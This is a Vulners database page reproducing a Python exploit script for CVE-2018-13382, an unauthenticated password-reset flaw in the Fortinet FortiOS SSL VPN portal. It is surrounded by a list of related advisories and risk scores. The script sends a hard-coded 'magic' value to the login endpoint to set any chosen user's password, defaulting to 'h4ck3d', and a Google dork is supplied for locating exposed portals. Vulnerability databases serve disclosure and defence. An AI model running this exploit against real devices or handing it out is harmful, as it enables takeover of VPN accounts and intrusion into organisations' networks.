Vulners
Lucene search
Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices | 10 Jun 202212:00 | – | ics |
 | CVE-2018-13382 | 4 Jun 201900:00 | – | attackerkb |
 | CVE-2018-13382 | 5 Jun 201900:26 | – | circl |
 | Fortinet FortiOS and FortiProxy Improper Authorization | 10 Jan 202200:00 | – | cisa_kev |
 | CISA Adds 15 Known Exploited Vulnerabilities to Catalog | 10 Jan 202200:00 | – | cisa |
 | Fortinet FortiOS Authorization Issues Vulnerability | 27 May 201900:00 | – | cnvd |
 | CVE-2018-13382 | 4 Jun 201920:33 | – | cve |
 | CVE-2018-13382 | 4 Jun 201920:33 | – | cvelist |
 | Protect | 30 Aug 201900:00 | – | fortinet |
| FortiProxy - Unauthenticated SSL VPN users password modification | 1 Jun 202100:00 | – | fortinet |
10
# Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
# Google Dork: intitle:"Please Login" "Use FTM Push"
# Date: 15/11/2020
# Exploit Author: Ricardo Longatto
# Details: This exploit allow change users password from SSLVPN web portal
# Vendor Homepage: https://www.fortinet.com/
# Version: Exploit to Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10.
# Tested on: 6.0.4
# NVD: https://nvd.nist.gov/vuln/detail/CVE-2018-13382
# CVE : CVE-2018-13382
# Credits: Vulnerability by Meh Chang and Orange Tsai.
#!/usr/bin/env python
import requests, urllib3, sys, re, argparse
urllib3.disable_warnings()
menu = argparse.ArgumentParser(description = "[+] Exploit FortiOS Magic backdoor - CVE-2018-13382 [+]")
menu.add_argument('-t', metavar='Target/Host IP', required=True)
menu.add_argument('-p', metavar='Port', required=True)
menu.add_argument('-u', metavar='User', required=True)
menu.add_argument('--setpass', metavar='SetNewPass', default='h4ck3d', help='set the password for user, if you not set, the default password will be set to h4ck3d')
op = menu.parse_args()
host = op.t
port = op.p
user = op.u
setpass = op.setpass
url = "https://"+host+":"+port+"/remote/logincheck"
exploit = {'ajax':'1','username':user,'magic':'4tinet2095866','credential':setpass}
r = requests.post(url, verify=False, data = exploit)
if re.search("/remote/hostcheck_install",r.text):
print "[+] - The new password to ["+user+"] is "+setpass+" <<<< [+]"
else:
print "Exploit Failed. :/"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Nov 2020 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 25
CVSS 3.17.5 - 9.1
EPSS0.87082
SSVC